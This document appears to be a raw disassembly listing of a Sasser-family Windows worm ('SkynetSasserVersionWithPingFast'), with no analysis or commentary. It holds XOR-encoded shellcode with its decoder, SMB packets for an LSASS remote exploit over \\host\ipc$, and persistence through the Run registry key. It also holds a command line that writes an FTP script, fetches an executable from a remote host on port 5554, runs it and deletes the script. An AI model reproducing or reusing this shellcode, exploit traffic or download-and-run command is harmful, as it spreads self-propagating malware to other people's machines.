dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 10h
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aInternetgetcon db 'InternetGetConnectedState',0
aWininet_dll db 'WININET.dll',0
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0
dd 63490000h, 6553706Dh, 6345646Eh, 6F68h, 63490000h, 7243706Dh
dd 65746165h, 656C6946h, 70690000h, 61706C68h, 642E6970h
dd 6C6Ch, 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h
dd 65470000h, 61745374h, 70757472h, 6F666E49h, 41h, 43746547h
dd 616D6D6Fh, 694C646Eh, 41656Eh, 65470000h, 72655674h
dd 6E6F6973h, 0
aExitprocess db 'ExitProcess',0
dd 65540000h, 6E696D72h, 50657461h, 65636F72h, 7373h, 65470000h
dd 72754374h, 746E6572h, 636F7250h, 737365h, 6E550000h
dd 646E6168h, 4564656Ch, 70656378h, 6E6F6974h, 746C6946h
dd 7265h, 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 41h, 65657246h, 69766E45h, 6D6E6F72h, 53746E65h
dd 6E697274h, 577367h, 69570000h, 68436564h, 6F547261h
dd 746C754Dh, 74794269h, 65h, 45746547h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 73h, 45746547h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 5773h, 65530000h, 6E614874h, 43656C64h
dd 746E756Fh, 0
aGetstdhandle db 'GetStdHandle',0
align 4
aGetfiletype db 'GetFileType',0
dd 65480000h, 65447061h, 6F727473h, 79h, 70616548h, 61657243h
dd 6574h, 69560000h, 61757472h, 6572466Ch, 65h, 70616548h
dd 65657246h, 0
aRtlunwind db 'RtlUnwind',0
align 4
aWritefile db 'WriteFile',0
align 4
aMultibytetowid db 'MultiByteToWideChar',0
dd 65470000h, 72745374h, 54676E69h, 41657079h, 0
aGetstringtypew db 'GetStringTypeW',0
align 10h
dd 65470000h, 49504374h, 6F666Eh, 65470000h, 50434174h
dd 0
aGetoemcp db 'GetOEMCP',0
align 4
aHeapalloc db 'HeapAlloc',0
align 10h
aVirtualalloc db 'VirtualAlloc',0
align 10h
aHeaprealloc db 'HeapReAlloc',0
dd 434C0000h, 5370614Dh, 6E697274h, 4167h, 434C0000h, 5370614Dh
dd 6E697274h, 5767h, 161h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset sub_403D0B
dword_406010 dd 0 dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_405A5C+586h
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd offset word_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 0
dd offset word_40A89A
dd 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
off_4068C8 dd offset aSkynetave_exe ; DATA XREF: sub_402176:loc_4021CE�r
; sub_402176+B5�r
; "skynetave.exe"
dd offset aLogon ; "Logon"
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B46+1A�r
; sub_401B46+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B46+77�r
; sub_401B46+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B46+A8�r
; sub_401B46+B5�r
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B46+2BC�r
; sub_401B46+2C9�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B46+184�r
; sub_401B46+191�r
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B46+1B9�r
; sub_401B46+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4FhaLogon db 'Logon',0 ; DATA XREF: .text:004068CC�o
align 10h
aSkynetave_exe db 'skynetave.exe',0 ; DATA XREF: .text:off_4068C8�o
align 10h
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
aCWin2_log db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_401398+1DF�o
align 4
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A28 dd 6EB06EBh, 0 dword_406A30 dd 1CEC8166h dword_406A34 dd 0E4FF07h dword_406A38 dd 302E35h dword_406A3C dd 312E35h aQuit db 'QUIT',0 ; DATA XREF: sub_401B46+2DA�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_401B46+1A2�o
align 10h
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B46+173�o
; sub_401F2E+15�o
word_406A5C dw 2Ch ; DATA XREF: sub_401B46+EE�r
align 10h
aPort db 'PORT',0 ; DATA XREF: sub_401B46+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_401B46+95�o
align 10h
aUser db 'USER',0 ; DATA XREF: sub_401B46+64�o
align 4
asc_406A78: ; DATA XREF: sub_401F2E+146�o
unicode 0, < >,0
aSkynetsasserve db 'SkynetSasserVersionWithPingFast',0 ; DATA XREF: sub_4020C8+50�o
aJobaka3 db 'Jobaka3',0 ; DATA XREF: sub_4020C8+F�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_402176+8C�o
align 4
asc_406AD4: ; DATA XREF: sub_402176+4B�o
unicode 0, <\>,0
align 10h
off_406AE0 dd offset sub_402B9F ; DATA XREF: sub_4029D4+1C�r
dword_406AE4 dd 2 ; sub_403669+46�r
align 10h
off_406AF0 dd offset word_406AFA ; DATA XREF: sub_4028B0+1E�r
; sub_402AEC+12�r ...
dd offset word_406AFA
db 2 dup(0)
word_406AFA dw 20h ; DATA XREF: sub_403916+18�r
; .text:off_406AF0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CFC dd 1 dd 2Eh, 1
dword_406D08 dd 0C0000005h ; sub_402DA4+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D80 dd 3 dword_406D84 dd 7 dword_406D88 dd 0Ah dword_406D8C dd 8Ch ; sub_402C63+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D9C dd 19930520h, 4 dup(0) ; sub_403536+2�o
dword_406DB0 dd 2 ; sub_403669+28�r
off_406DB4 dd offset aR6002FloatingP ; DATA XREF: sub_403669+FC�r
; sub_403669+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 405384h, 9, 405358h, 0Ah, 405334h, 10h, 405308h
dd 11h, 4052D8h, 12h, 4052B4h, 13h, 405288h, 18h, 405250h
dd 19h, 405228h, 1Ah, 4051F0h, 1Bh, 4051B8h, 1Ch, 405190h
dd 78h, 405180h, 79h, 405170h, 7Ah, 405160h, 0FCh, 40515Ch
dd 0FFh, 40514Ch
byte_406E40 db 1 ; DATA XREF: sub_403669+1B�o
; sub_403947+E1�r
db 2, 4, 8
align 8
dword_406E48 dd 3A4h dword_406E4C dd 82798260h, 21h, 0dword_406E58 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F38 dd 3F8h ; sub_403D94+5�r
align 10h
dword_406F40 dd 0 ; sub_401000+10�w ...
dword_406F44 dd 0 ; sub_401210+D�r
dword_406F48 dd 0 ; sub_401398+C�o ...
dword_406F4C dd 0 ; sub_402720+91�w
dword_406F50 dd 0 ; sub_402E3F:loc_402E51�r ...
align 8
dword_406F58 dd 0 dd 3 dup(0)
dword_406F68 dd 0 dword_406F6C dd 0 dword_406F70 dd 0 dword_406F74 dd 0 dword_406F78 dd 0 dword_406F7C dd 0 dd 0
dword_406F84 dd 0 dd 3 dup(0)
dword_406F94 dd 0 dd 0
byte_406F9C db 0 ; DATA XREF: sub_402BB0+2D�w
align 10h
dword_406FA0 dd 0 dword_406FA4 dd 0 ; sub_402BB0+8B�w
dword_406FA8 dd 0 ; sub_402C63+46�w ...
dword_406FAC dd 34h dup(0) dword_40707C dd 0Dh dup(0) ; .text:00406638�o ...
dword_4070B0 dd 0 ; sub_403145+23�w ...
dword_4070B4 dd 0 dword_4070B8 dd 0 ; sub_4037BC:loc_403826�w
dword_4070BC dd 0 ; sub_403AE0+4�w ...
dword_4070C0 dd 0 ; resolved to->USER32.MessageBoxA ; sub_404613+2E�w ...
dword_4070C4 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_404613:loc_404662�r
dword_4070C8 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_404613+60�r
dd 2 dup(0)
dword_4070D4 dd 0 dd 3 dup(0)
dword_4070E4 dd 0 ; sub_403AE0+3A�r ...
dd 0
dword_4070EC dd 0 ; sub_40479E+4C�w ...
dword_4070F0 dd 0 dword_4070F4 dd 0 dword_4070F8 dd 0 ; sub_404467+5�r ...
dword_4070FC dd 0 ; sub_403E33+259�r ...
dword_407100 dd 0 ; sub_403E33+310�w ...
dword_407104 dd 0 ; sub_403E33+22C�r ...
dword_407108 dd 0 ; sub_403E08�r ...
dword_40710C dd 0 ; sub_403E08+8�r ...
dword_407110 dd 0 ; sub_403947+65�w ...
align 10h
dword_407120 dd 3 dup(0) ; sub_403947+171�o ...
dword_40712C dd 0 ; sub_403947+15D�w ...
dd 4 dup(0)
byte_407140 db 0 ; DATA XREF: sub_403B86:loc_403C92�w
; sub_403B86:loc_403CAF�w ...
align 4
dd 3Fh dup(0)
byte_407240 db 0 ; DATA XREF: sub_403947+5C�o
; sub_403947+AF�o ...
byte_407241 db 0 ; DATA XREF: sub_402F91+3F�r
; sub_402F91+84�r ...
align 4
dd 40h dup(0)
dword_407344 dd 0 ; sub_403947+12B�w ...
dword_407348 dd 0 ; sub_403422+29�r ...
dd 5 dup(0)
dword_407360 dd 0 ; sub_403277+45�r ...
dword_407364 dd 3Fh dup(0) dword_407460 dd 0 ; sub_403277:loc_403301�r ...
dword_407464 dd 0 dword_407468 dd 0 dword_40746C dd 0 dword_407470 dd 0 ; sub_402BB0+57�r
dword_407474 dd 0 dword_407478 dd 0 ; sub_402DE7+F�r ...
dd 6E1h dup(0)
_text ends
; Section 2. (virtual address 00009000)
; Virtual size : 00017010 ( 94224.)
; Section size in file : 00017010 ( 94224.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 409000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 4 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C809A51h, 7C809AE4h, 0
dd 9010h, 0
dd 0FFFFFFFFh, 904Ch, 9010h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 4C000000h, 4C64616Fh
dd 61726269h, 417972h, 47000000h, 72507465h, 6441636Fh
dd 73657264h, 73h, 72695600h, 6C617574h, 6F6C6C41h, 63h
dd 72695600h, 6C617574h, 65657246h, 48A0000h, 0A21D9AE5h
dd 5DA6561Bh, 74F9E498h, 6832C04Fh, 582D02F9h, 3C2343A3h
dd 0B6C52446h, 549C21Ch, 10EDD4A1h, 1914CB8Dh, 5000083Fh
dd 8B600000h, 8B242474h, 247Ch, 245C8B28h, 1B8BFC2Ch, 0DB85C933h
dd 80B21074h, 0DF030000h, 0E803B1A4h, 66h, 0FB3BF673h
dd 7C73h, 33575553h, 0ED3343DBh, 7C8DC38Bh, 0EB8B001Dh
dd 0DF8B0800h, 0F11C49E8h, 3D5C8Dh, 800C703h, 3AE8EF8Bh
dd 5D5FE20Eh, 73C12B5Bh, 8B090000h, 34E8C5h, 1CEB0000h
dd 0AC08E0C1h, 0E840h, 28h, 13DE88Bh, 83000040h, 813DFFD9h
dd 7076000h, 2BF78B56h, 5EA4F3F0h, 4141h, 0D20295EBh, 168A0575h
dd 0C3D21246h, 0E841C933h, 0FFEE0000h, 0C913FFFFh, 0FFFFE7E8h
dd 0C3F272FFh, 107C2Bh, 7C892824h, 0C2611C24h, 0B4480010h
dd 40003085h, 56DE03h, 90100060h, 90140000h, 7DF80000h
dd 77F40000h, 7FFDEBF8h, 6800h, 0B8h, 803054A0h, 400001Dh
dd 9A330000h, 0F8904000h, 57D70000h, 0F3A0000h, 40010000h
dd 501C02h, 4D5D00h, 610A7A00h, 3100F61h, 6430058h, 1004h
dd 3D57h, 80000h, 880107h, 51530000h, 55565752h, 1DE84000h
dd 30ED815Dh, 8D100011h, 25B5h, 8B100011h, 0C083FC46h
dd 8BF02B04h, 468B0856h, 31C0041h, 89088BC2h, 17128F8Dh
dd 0C418520h, 14240C93h, 0C970C06h, 0C100028h, 8BDE0C9Bh
dd 0F6854473h, 0E74h, 2BB9h, 8BF20300h, 0FA03407Bh, 0F38BA4F3h
dd 8D8D0000h, 1000129Fh, 226E851h, 4E8B0000h, 808B2Ch
dd 56032456h, 68406A08h, 6A5197h, 12FF0000h, 128B8589h
dd 0E8561000h, 3D7h, 2041E856h, 0CB0504DFh, 20620502h
dd 85343280h, 89840FC9h, 4E54h, 0E8565108h, 53Eh, 7B74C085h
dd 176F958Bh, 10000000h, 17738D8Bh, 0C9851000h, 8D8D0875h
dd 1367h, 2DEB1000h, 0C1F7h, 1E748000h, 0FFE18152h, 0FFFF0000h
dd 858D517Fh, 10001323h, 3C858D50h, 4000018h, 95FF5010h
dd 8B1D257Dh, 0C8030846h, 414100F8h, 858D5152h, 2B012D1h
dd 8D106A1Eh, 6A15BB85h, 0FF000800h, 1177995h, 13C395FFh
dd 401000h, 800068h, 0FF006A00h, 468BB8B5h, 8B280000h
dd 0C703087Eh, 468B10FFh, 5DC7030Ch, 97C5F5Eh, 0C35B595Ah
dd 205Eh, 100013A2h, 100013BBh, 1088142h, 6D100013h, 56100013h
dd 451B0000h, 7972746Eh, 696F5020h, 4E20746Eh, 746Fh, 756F4620h
dd 5400646Eh, 70206568h, 65636F72h, 7564030Ch, 65206572h
dd 7023h, 20732523h, 6C756F63h, 6F6E2064h, 65622074h, 6C200000h
dd 7461636Fh, 69206465h, 6874206Eh, 2065h, 616E7964h, 2063696Dh
dd 6B6E696Ch, 62696C20h, 617200C0h, 25207972h, 6F512E73h
dd 1DD6472h, 6C616E69h, 1642520h, 615B4300h, 5D796Eh, 1000138Ch
dd 0BD638098h, 65737500h, 33720000h, 6C642E32h, 654D006Ch
dd 67617373h, 4265h, 41786Fh, 72707377h, 66746E69h, 656B0041h
dd 6E720B00h, 45226C65h, 50746978h, 73DD8056h, 0CAF0073h
db 0, 49h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push ebp
push ebx
push edi
push esi
add [eax-147EA45Bh], al
setalc
adc eax, [eax]
adc [ebx+0E8B0875h], cl ; CODE XREF: .rsrc:0040946D�j
add eax, [eax-0AE34F8h]
xchg eax, ebx
xchg eax, ebp
test eax, eax
jz short loc_409471
mov [eax], esp
add [ebp-4], eax
mov edx, [esi+4] ; CODE XREF: .rsrc:00409441�j
add edx, ebx
jle short near ptr loc_40943C+2
mov eax, [edx] ; CODE XREF: .rsrc:00409462�j
test [edx], eax
add al, al
jz short loc_409465
push edx
mov eax, [edx]
add eax, ebx
push eax
push dword ptr [ebp-4]
call dword ptr [ebx-7A51E000h]
sal byte ptr [esp+edx-55h], 5Ah
add edx, 4
jmp short near ptr loc_409443+1
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_409465: ; CODE XREF: .rsrc:00409449�j
add [ebx+68B0CC6h], al
test eax, eax
jnz short near ptr loc_409425+5
xor eax, eax
loc_409471: ; CODE XREF: .rsrc:00409435�j
jmp short near ptr dword_409478
; ---------------------------------------------------------------------------
db 0B8h
dd 56FFFFh
dword_409478 dd 5F5EFFFFh, 0C2C95D5Bh, 6E000004h, 8B087D8Bh, 5F8B0447h
; CODE XREF: .rsrc:loc_409471�j
dd 74C33B08h, 8B44h, 0F6853877h, 0F3033D74h, 0D82BD38Bh
dd 0ADFC5D89h, 0D88B0000h, 85ADDA03h, 8B2A74C0h, 8E983C8h
dd 0C985h, 0AD66ED74h, 0E781F88Bh, 0FFFh, 0C166FB03h, 0CE80000h
dd 3F88366h, 458B0575h, 490701FCh, 15887549h, 62CCEBE1h
dd 555F0600h, 0D2085D8Bh, 0A9ED815Dh, 8890014h, 3C4E8B10h
dd 8004AADBh, 83085667h, 0B70F48C3h, 18A90C43h, 1075E4C1h
dd 6F75D0A9h, 0FFA94601h, 7EEB6875h, 338B51h, 53085418h
dd 0EB8BC933h, 0E5BB70Fh, 0CF3B0000h, 68B4D7Dh, 1275FF3Ch
dd 7425FC80h, 8005h, 87515FCh, 8306C683h, 0E4EB06C1h, 0E74E83Ch
dd 0E93C0000h, 468B2975h, 0F8385701h, 8EB1875h, 8B57h
dd 0D8380146h, 0C1660E75h, 0C0C108E8h, 2BC48610h, 89C10000h
dd 835F0146h, 0C18305C6h, 46B3EB05h, 0EB41h, 0EB595BAFh
dd 8B575118h, 0FFA033Bh, 830E4BB7h, 2EC0000h, 57525166h
dd 16E8h, 83595F00h, 5610C3h, 0E9057449h, 0FFFFFF5Ch, 0D400045Dh
dd 8758B60h, 104D8B66h, 20C558Bh, 3071980h, 88966C2h, 0C961F4EBh
dd 1E2B0CC2h, 800800E6h, 100015FFh, 1591858Dh, 0D0C2D21Bh
dd 0A78B0889h, 48896105h, 22CC1604h, 16011649h, 2000A90Ch
dd 0E9407525h, 0A4h, 3F28B51h, 8B331980h, 84B84BDh, 0F9C1C18Bh
dd 0F3020014h, 83C803A5h, 0A4F303E1h, 9B60FC8Bh, 47B03FAh
dd 591B00F7h, 8B5D69EBh, 4087Dh, 163403h, 0F78B5110h, 8B30772Bh
dd 0C600A8FEh, 0C703574Ah, 10015256h, 0A68D8D5Ch, 84B8B51h
dd 8D8D89h, 5105B60Ch, 0D0FF5657h, 50A18B5Ah, 0E6E63C8h
dd 5F5E6678h, 4ED7B1EBh, 0B2383A38h, 16B70DC8h, 740D1500h
dd 0E083F259h, 5007402h, 738B514Ah, 4B8B8604h, 74000308h
dd 7B8B62F2h, 8BFA0304h, 84B02C3h, 0AAF3C033h, 1D083B82h
dd 17002610h, 7FADE285h, 0C758B56h, 5D8B0002h, 39C03308h
dd 4751046h, 2C740639h, 741C3000h, 8430303h, 30C4E8Bh
dd 84Bh, 85107E8Bh, 30374FFh, 5750087Bh, 19E85351h, 0
dd 0FFF88300h, 0C6830774h, 33C9EB14h, 22505EC0h, 0A6C2C9h
dd 5340A315h, 0AF193855h, 0C459986h, 83892704h, 89C033A2h
dd 0A4E66083h, 75FFB88Bh, 11FF0Ch, 0FC4589D2h, 7F74C085h
dd 10758Bh, 14557280h, 275D285h, 0F685D68Bh, 0F28B0275h
dd 0CA43E00Ch, 0C7100017h, 10384331h, 0B85249DEh, 0E1A94941h
dd 13808B0Ah, 0E2E28112h, 5D8B0BEBh, 1808B08h, 8530312h
dd 3E02C283h, 18092D58h, 10001311h, 900752h, 0C0855400h
dd 895A1174h, 83028906h, 0C68304C2h, 0EB0400B6h, 0EBC0339Bh
dd 63F5A06h, 0C95B5D05h, 0EF0063C2h, 748B6000h, 7C8B2424h
dd 5C8B2824h, 8BFC2C24h, 74DB851Bh, 3D2334Eh, 0FB3BA4DFh
dd 20E84573h, 73000000h, 27E8F4h, 0E8910000h, 21h, 41414848h
dd 0AC08E0C1h, 0F78B5640h, 0A4F3F02Bh, 66D7EB5Eh, 875D203h
dd 92AD6692h, 42D20366h, 40C033C3h, 0FFFFEAE8h, 0E8C013FFh
dd 0FFFFFFE3h, 2BC3F272h, 8928247Ch, 611C247Ch, 0C50010C2h
dd 5B000090h, 44000009h, 85000001h, 18000097h, 1C000090h
